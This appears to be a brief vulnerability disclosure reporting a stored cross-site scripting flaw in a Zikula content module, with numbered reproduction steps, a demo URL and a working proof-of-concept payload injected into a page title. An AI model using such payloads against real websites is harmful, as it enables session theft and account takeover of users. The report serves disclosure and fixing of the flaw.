Cross-site Scripting (XSS) - Stored in zikula-modules/contentValid
Aug 31st 2021
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites
🕵️♂️ Proof of Concept
// PoC.js 1- Go to --> [PAGEID]?slug=pages/content-introduction-page 2- inject this payload on the title of the page "'`--><svg/onload=alert(5)> 3 - POC --> https://demo.ziku.la/content/page/edit/2?slug=pages/content-introduction-page
//Please if you still need more information , let me know .
.. This vulnerability is capable of... steal user session , takeover user account , make redirect user to attacker controlled site ...//